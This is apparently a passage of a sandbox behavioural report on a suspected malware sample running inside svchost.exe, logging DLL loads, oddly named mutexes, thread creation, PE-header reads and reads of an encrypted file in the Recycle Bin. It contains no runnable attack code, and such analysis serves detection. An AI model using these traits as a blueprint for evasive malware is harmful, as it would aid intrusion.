C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown 1A90000 65536 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 8E0000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 990000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown A10000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit A10000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit A10000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit A10000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit A10000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 8906B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
912 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 890639
1128 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
1164 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
1652 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
1984 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2644 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3168 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3156 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
4392 0s success or wait 834 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
912 1100 success or wait 0 890279
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2077675108
Thread created PID: 1100 TID: 912 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077680377
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2077690705
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2077692129
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2077698192
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2077699824
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2077734904
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 8E0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2077748094
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2077779405
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2077804395
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2077955299
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2077956876
Thread created PID: 1100 TID: 1128 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077961783
Thread delayed Time: 0 TID: 4392 success or wait 2077964057
System info queried Type: BasicInformation success or wait 2077964233
System info queried Type: ProcessorInformation success or wait 2077964544
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2077964951
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2077966200
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2077966853
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 990000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2077968961
System info queried Type: BasicInformation success or wait 2077969792
System info queried Type: ProcessorInformation success or wait 2077970090
Thread created PID: 1100 TID: 1164 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077973186
Thread created PID: 1100 TID: 1652 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077975911
Thread delayed Time: 0 TID: 4392 success or wait 2077978313
Thread delayed Time: 0 TID: 4392 success or wait 2077978713
System info queried Type: BasicInformation success or wait 2077979196
System info queried Type: ProcessorInformation success or wait 2077979497
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2077979904
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2077981026
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2077981671
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078002369
System info queried Type: BasicInformation success or wait 2078003196
System info queried Type: ProcessorInformation success or wait 2078003496
System info queried Type: BasicInformation success or wait 2078005662
System info queried Type: ProcessorInformation success or wait 2078005951
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078006411
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2078007558
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078008224
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078010253
System info queried Type: BasicInformation success or wait 2078011069
System info queried Type: ProcessorInformation success or wait 2078011365
System info queried Type: BasicInformation success or wait 2078013498
System info queried Type: ProcessorInformation success or wait 2078013787
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078014191
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2078015306
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078015971
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078018063
System info queried Type: BasicInformation success or wait 2078018875
System info queried Type: ProcessorInformation success or wait 2078019172
System info queried Type: BasicInformation success or wait 2078021517
System info queried Type: ProcessorInformation success or wait 2078021806
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078022212
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2078023325
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078023992
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078026076
System info queried Type: BasicInformation success or wait 2078026888
System info queried Type: ProcessorInformation success or wait 2078027184
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2078029724
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2078032008
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2078033449
System info queried Type: BasicInformation success or wait 2078051188
System info queried Type: ProcessorInformation success or wait 2078051498
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078051917
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2078053073
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078054050
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2078054373
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2078055262
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2078056151
System info queried Type: BasicInformation success or wait 2078057040
System info queried Type: ProcessorInformation success or wait 2078057346
System info queried Type: BasicInformation success or wait 2078059564
System info queried Type: ProcessorInformation success or wait 2078059858
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078060273
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078061405
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078062324
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078062642
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078063572
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078064454
System info queried Type: BasicInformation success or wait 2078065279
System info queried Type: ProcessorInformation success or wait 2078065581
System info queried Type: BasicInformation success or wait 2078068160
System info queried Type: ProcessorInformation success or wait 2078068455
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078068867
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078069998
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078070672
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078070987
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078071866
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078072745
System info queried Type: BasicInformation success or wait 2078073614
System info queried Type: ProcessorInformation success or wait 2078073916
System info queried Type: BasicInformation success or wait 2078076600
System info queried Type: ProcessorInformation success or wait 2078076894
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078077309
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078078441
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078079122
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078079437
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078080318
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078081200
System info queried Type: BasicInformation success or wait 2078082024
System info queried Type: ProcessorInformation success or wait 2078082326
System info queried Type: BasicInformation success or wait 2078085345
System info queried Type: ProcessorInformation success or wait 2078085639
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078086054
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078087181
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078087856
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078088169
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078089044
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078089921
System info queried Type: BasicInformation success or wait 2078090743
System info queried Type: ProcessorInformation success or wait 2078091044
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2078093663
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2078095582
System info queried Type: BasicInformation success or wait 2078107193
System info queried Type: ProcessorInformation success or wait 2078107499
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078107915
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078109050
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078109728
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078110045
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078111034
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078111832
System info queried Type: BasicInformation success or wait 2078112667
System info queried Type: ProcessorInformation success or wait 2078112969
System info queried Type: BasicInformation success or wait 2078115666
System info queried Type: ProcessorInformation success or wait 2078115961
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078116376
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078117508
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078118186
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078118500
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078119380
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078120260
System info queried Type: BasicInformation success or wait 2078121089
System info queried Type: ProcessorInformation success or wait 2078121390
System info queried Type: BasicInformation success or wait 2078124044
System info queried Type: ProcessorInformation success or wait 2078124378
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078124796
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078125919
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078126589
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078126905
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078127783
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078128665
